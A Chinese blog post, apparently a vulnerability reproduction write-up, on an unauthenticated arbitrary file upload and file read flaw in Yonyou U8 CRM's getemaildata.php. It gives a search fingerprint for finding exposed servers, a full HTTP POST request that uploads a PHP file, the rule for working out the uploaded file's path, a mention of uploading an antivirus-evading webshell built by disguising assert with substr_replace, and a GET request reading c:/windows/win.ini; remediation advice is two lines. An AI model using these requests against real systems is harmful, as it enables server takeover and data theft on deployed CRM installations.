当前位置: 首页 > news >正文

用友U8+CRM 任意文件上传+读取漏洞复现

0x01 产品简介

      用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

0x02 漏洞概述

   用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。

0x03 复现环境

鹰图指纹:web.body="用友U8CRM"

35afa0e8e728439f93031bc036fc725a.png

0x04 漏洞复现 

 文件上传PoC

POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host:your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="a.php "
Content-Type: text/plain<?php phpinfo();?>
------WebKitFormBoundarykS5RKgl8t3nwInMQ

0ee7f3ea7708466780d571ce55fb8451.png

 PS:访问的解析文件格式为upd***.tmp.php,星号部分为返回的文件名的十六进制减去一,例如上图中(不带mht):1022——>31303232(十六进制),31303231(十六进制减一)——>1021

207d3283cbe04a0f90c44964a2250b24.png

3f93ebe2208844f88d7ee947958c913a.png

 验证url

http://your-ip/tmpfile/upd十六进制减一.tmp.php

0f36418522c548e9ba844599eea1fe70.png

 上传免杀马子

0b4c71a617b7461697606617368147e8.png

PS:利用 substr_replace() 函数变形 assert 达到免杀的效果 

尝试连接

6b4ce5fba29947a4b1168fdd7f3ceb9c.png

 文件读取PoC

GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
Content-Type: application/json
Host: your-ip

aa3e37b0a3d04fed8c3bc1063bf8649a.png

0x05 修复建议

关闭互联网访问权限,文件上传模块做好权限强认证。

 尽快打补丁!

 

 

 

 

 

http://www.lryc.cn/news/129278.html

相关文章:

  • 【量化课程】08_1.机器学习量化策略基础实战
  • Mongodb 更新集合的方法到底有几种 (中) ?
  • 预演攻击:谁需要网络靶场,何时需要
  • 【Linux】IO多路转接——poll接口
  • 系统架构设计师---OSI七层协议
  • Next.js - Route Groups(路由组)
  • musl libc ldso 动态加载研究笔记:01
  • 2023 年 4 款适用于安卓手机的最佳 PDF 转 Word 转换器
  • 前端:运用html+css+jquery.js实现截图游戏
  • Maven之JDK编译问题
  • 开发测试框架一 - 创建springboot工程及基础操作
  • 【IMX6ULL驱动开发学习】08.马达驱动实战:驱动编写、手动注册平台设备和设备树添加节点信息
  • 直方图均衡化和自适应直方图均衡化
  • 京东门详一码多端探索与实践 | 京东云技术团队
  • 数据挖掘 | 零代码采集房源数据,支持自动翻页、数据排重等
  • 迪米特法则
  • 云积天赫|AIGC+营销的排头兵
  • Oracle 数据库备份
  • 【C++】模板template
  • 智能工厂:适应不断变化的制造世界
  • 大数据课程I3——Kafka的消息流与索引机制
  • LVGL学习笔记 28 - 键盘keyboard
  • 【Microsoft 支持】【数据库-MySql】当您尝试从大于 5000 的 TCP 端口连接时收到错误 WSAENOBUFS (10055)
  • 【学会动态规划】最长湍流子数组(23)
  • 【网络编程·网络层】IP协议
  • HTML详解连载(7)
  • 一文打通redis中的String类型
  • 优测云服务平台|【压力测试功能升级】轻松完成压测任务
  • UseEffect中使用setState更新后获取的值为何依然是更新前
  • 去掉鼠标系列之一: 语雀快捷键使用指南